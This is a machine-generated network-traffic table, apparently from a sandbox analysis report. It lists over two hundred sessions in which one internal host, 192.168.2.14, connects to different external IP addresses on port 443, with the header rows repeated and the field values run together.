                                                        10970192.168.2.1441716200.161.108.40443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10971192.168.2.1444392125.251.164.101443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10972192.168.2.1455486190.139.93.38443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10973192.168.2.1439584174.152.151.236443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10974192.168.2.1447912196.86.221.109443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10975192.168.2.1435292205.173.11.165443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10976192.168.2.1456342168.121.82.119443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10977192.168.2.1448188155.9.89.181443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10978192.168.2.1441282120.211.79.82443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10979192.168.2.143390288.47.63.23443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10980192.168.2.145630293.100.215.120443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10981192.168.2.1455658160.220.255.46443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10982192.168.2.1437400223.47.228.21443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10983192.168.2.1447696134.106.211.78443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10984192.168.2.143348269.107.131.89443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10985192.168.2.144805849.179.31.9443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10986192.168.2.1443046151.137.193.41443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10987192.168.2.143802844.164.105.149443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10988192.168.2.1449150123.76.148.11443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10989192.168.2.144803020.254.225.199443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10990192.168.2.1457508167.151.132.227443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10991192.168.2.1445898207.192.164.222443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10992192.168.2.145907659.15.239.141443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10993192.168.2.1434990165.196.126.23443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10994192.168.2.1454222137.193.65.236443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10995192.168.2.1434374208.44.52.225443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10996192.168.2.143751279.187.62.2443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10997192.168.2.143461249.57.138.66443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10998192.168.2.1453632155.247.64.214443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10999192.168.2.1457754131.193.251.79443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11000192.168.2.143684459.134.233.189443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11001192.168.2.145412285.109.29.194443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11002192.168.2.1446586173.157.180.122443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11003192.168.2.1452862132.42.155.239443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11004192.168.2.145458467.80.39.165443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11005192.168.2.1437826180.63.1.51443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11006192.168.2.14532564.131.54.208443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11007192.168.2.144732294.235.128.152443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11008192.168.2.144475246.84.222.124443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11009192.168.2.1455136184.117.122.246443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11010192.168.2.143700667.200.31.230443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11011192.168.2.143600293.93.18.80443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11012192.168.2.1453838134.119.198.128443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11013192.168.2.1456154121.104.53.132443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11014192.168.2.14528149.186.236.187443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11015192.168.2.1439538149.79.176.176443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11016192.168.2.1457498189.38.109.90443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11017192.168.2.144861490.86.179.160443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11018192.168.2.143401262.119.124.241443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11019192.168.2.144661467.79.226.120443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11020192.168.2.145488418.107.128.158443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11021192.168.2.143975624.118.91.215443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11022192.168.2.144528013.159.198.113443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11023192.168.2.1442710175.151.153.156443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11024192.168.2.144752673.180.192.249443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11025192.168.2.1450380146.50.226.238443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11026192.168.2.1457688167.176.218.117443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11027192.168.2.1434002117.7.212.170443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11028192.168.2.143387464.28.98.56443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11029192.168.2.14328085.244.19.206443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11030192.168.2.143986284.221.54.176443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11031192.168.2.1436366154.105.197.104443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11032192.168.2.1449444183.194.12.127443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11033192.168.2.144548640.67.158.224443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11034192.168.2.1436800178.193.220.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11035192.168.2.145703077.54.52.137443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11036192.168.2.1460432216.68.165.242443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11037192.168.2.1452168113.24.113.250443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11038192.168.2.1458984209.116.124.112443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11039192.168.2.1442270207.176.119.137443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11040192.168.2.1447624165.228.97.26443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11041192.168.2.1440348140.23.223.137443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11042192.168.2.1459024114.162.167.18443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11043192.168.2.1436802165.8.31.200443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11044192.168.2.145979013.200.223.139443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11045192.168.2.1439282202.199.7.32443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11046192.168.2.1453360192.59.147.81443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11047192.168.2.145446045.70.56.241443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11048192.168.2.1433544144.23.93.195443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11049192.168.2.144013438.6.95.195443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11050192.168.2.1460578213.1.211.98443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11051192.168.2.145600460.115.32.127443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11052192.168.2.1443608173.188.249.68443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11053192.168.2.14580042.74.114.137443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11054192.168.2.1445790207.253.198.224443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11055192.168.2.1446672160.56.111.35443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11056192.168.2.145068677.6.114.131443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11057192.168.2.145870246.247.227.121443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11058192.168.2.145629077.155.131.167443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11059192.168.2.145765088.151.255.243443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11060192.168.2.1459202210.74.144.95443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11061192.168.2.1453018145.58.178.172443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11062192.168.2.1457348204.167.189.208443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11063192.168.2.1450532194.87.128.43443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11064192.168.2.1460590106.204.9.245443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11065192.168.2.1439954170.229.115.58443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11066192.168.2.1439912182.41.66.3443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11067192.168.2.146052417.88.212.143443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11068192.168.2.144960040.39.244.236443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11069192.168.2.1451940103.10.94.118443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11070192.168.2.1454662155.237.38.220443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11071192.168.2.1437216212.216.167.212443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11072192.168.2.144880640.173.169.249443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11073192.168.2.1442844188.141.95.199443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11074192.168.2.1439180205.204.241.39443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11075192.168.2.1436486199.29.102.117443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11076192.168.2.1460998138.82.26.96443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11077192.168.2.1459072205.56.131.223443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11078192.168.2.145324889.56.77.129443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11079192.168.2.1452860201.241.63.77443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11080192.168.2.144784879.159.24.131443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11081192.168.2.1441982116.225.102.80443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11082192.168.2.145171082.79.247.89443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11083192.168.2.145880050.158.208.67443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11084192.168.2.1460866213.236.102.140443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11085192.168.2.1449132139.214.247.224443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11086192.168.2.145763072.251.240.158443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11087192.168.2.1436568175.55.240.66443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11088192.168.2.14341425.139.199.99443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11089192.168.2.145603420.222.173.242443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11090192.168.2.144318431.23.130.17443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11091192.168.2.1436978124.100.244.198443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11092192.168.2.1439820101.228.134.91443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11093192.168.2.144490827.206.181.225443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11094192.168.2.1443112163.20.52.4443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11095192.168.2.1448922101.20.52.178443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11096192.168.2.144599865.179.159.109443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11097192.168.2.1448896150.202.203.172443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11098192.168.2.1437004210.3.23.18443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11099192.168.2.1451816199.160.42.121443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11100192.168.2.1447418210.242.100.233443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11101192.168.2.1439078107.230.194.29443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11102192.168.2.1446106161.102.29.21443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11103192.168.2.145920227.104.242.235443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11104192.168.2.1457002185.212.207.246443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11105192.168.2.1436664114.217.254.140443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11106192.168.2.1435376111.211.237.16443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11107192.168.2.1447708144.109.255.164443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11108192.168.2.143579853.136.6.174443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11109192.168.2.1439862174.73.31.44443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11110192.168.2.143349049.139.218.45443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11111192.168.2.145382617.213.248.92443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11112192.168.2.1433488182.95.117.100443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11113192.168.2.1439502208.75.25.188443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11114192.168.2.144286057.186.210.145443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11115192.168.2.1450444212.107.139.139443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11116192.168.2.144797635.218.75.180443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11117192.168.2.144641454.128.29.78443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11118192.168.2.1443124109.205.51.249443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11119192.168.2.143504025.64.160.1443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11120192.168.2.1436256124.247.108.105443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11121192.168.2.144519237.177.5.162443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11122192.168.2.144578074.46.193.184443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11123192.168.2.145303624.144.66.58443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11124192.168.2.143921625.4.119.120443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11125192.168.2.14608428.27.213.50443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11126192.168.2.145800442.211.27.165443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11127192.168.2.1455242114.145.84.2443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11128192.168.2.1435878222.186.153.94443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11129192.168.2.1444920208.231.219.237443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11130192.168.2.143664084.10.4.126443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11131192.168.2.146056666.160.132.156443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11132192.168.2.1439540126.51.193.133443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11133192.168.2.1434126187.243.243.97443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11134192.168.2.144063066.230.17.239443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11135192.168.2.1449512195.61.179.89443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11136192.168.2.144961467.77.10.103443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11137192.168.2.144814099.240.45.27443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11138192.168.2.1437478141.15.163.25443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11139192.168.2.1448628107.194.251.48443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11140192.168.2.144619468.4.104.92443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11141192.168.2.1438680193.202.12.196443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11142192.168.2.1454240170.194.146.59443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11143192.168.2.1438346223.70.60.63443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11144192.168.2.1450208160.181.66.232443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11145192.168.2.1444870113.9.80.192443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11146192.168.2.144803240.158.194.71443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11147192.168.2.1440522153.76.62.137443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11148192.168.2.1446262217.131.239.245443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11149192.168.2.1452970156.245.214.91443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11150192.168.2.144411053.59.205.236443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11151192.168.2.145590836.174.142.27443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11152192.168.2.144915094.128.237.220443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11153192.168.2.145324871.141.120.118443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11154192.168.2.1456090157.32.59.68443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11155192.168.2.14564305.120.86.11443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11156192.168.2.1449338125.57.70.213443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11157192.168.2.14488029.0.50.2443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11158192.168.2.143390853.239.86.59443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11159192.168.2.145935648.221.213.228443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11160192.168.2.144522081.138.195.238443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11161192.168.2.145700234.191.199.100443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11162192.168.2.143732290.104.170.176443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11163192.168.2.1446290141.160.88.245443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11164192.168.2.1447176198.147.86.227443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11165192.168.2.14505549.236.188.221443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11166192.168.2.1437382173.20.10.157443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11167192.168.2.1451660188.248.158.115443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11168192.168.2.1449014148.53.25.100443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11169192.168.2.1451024120.170.126.209443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11170192.168.2.1450270131.182.232.121443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11171192.168.2.144603019.232.16.104443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11172192.168.2.1437914182.158.206.119443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11173192.168.2.1452084194.26.47.180443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11174192.168.2.1441402143.244.231.30443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11175192.168.2.1454272128.155.190.102443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11176192.168.2.1440112164.145.162.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11177192.168.2.145578641.166.252.251443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11178192.168.2.145846681.174.229.112443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11179192.168.2.1436768105.89.180.204443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11180192.168.2.1449294151.52.112.254443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11181192.168.2.1443068184.145.27.224443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11182192.168.2.1435340113.253.244.54443
